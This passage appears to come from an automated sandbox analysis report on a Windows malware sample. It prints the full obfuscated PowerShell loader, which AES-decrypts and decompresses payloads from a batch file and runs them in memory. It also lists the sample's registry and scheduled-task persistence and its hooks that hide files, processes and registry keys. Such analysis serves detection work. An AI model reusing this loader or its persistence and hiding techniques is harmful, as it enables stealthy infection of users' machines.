(blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,

19_2_0000022413901E3C

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138EA7DD push rcx; retf 003Fh	19_3_00000224138EA7DE
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E1A7DD push rcx; retf 003Fh	20_3_000002BCD7E1A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8B23FB pushad ; retf	36_2_00007FFD9B8B2411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BFFE push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98B7F8 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C829 push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BF5F push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C749 push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BE69 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98CA5F push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BD89 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C9BE push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C1DA push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C1A0 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C91F push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C09F push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E8A7DD push rcx; retf 003Fh	37_3_0000026504E8A7DE
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1AAA7DD push rcx; retf 003Fh	38_3_0000025DC1AAA7DE
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC62A7DD push rcx; retf 003Fh	39_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ACA7DD push rcx; retf 003Fh	40_3_00000202C0ACA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612EA7DD push rcx; retf 003Fh	41_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDCA7DD push rcx; retf 003Fh	42_3_000002BAAEDCA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED9A7DD push rcx; retf 003Fh	42_3_000002BAAED9A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A879AA7DD push rcx; retf 003Fh	43_3_0000026A879AA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795378A7DD push rcx; retf 003Fh	44_3_000001795378A7DE
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E3A7DD push rcx; retf 003Fh	45_3_0000016CE5E3A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D54A7DD push rcx; retf 003Fh	46_3_000002295D54A7DE

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Creates job files (autostart)

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Stores large binary data to the registry

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
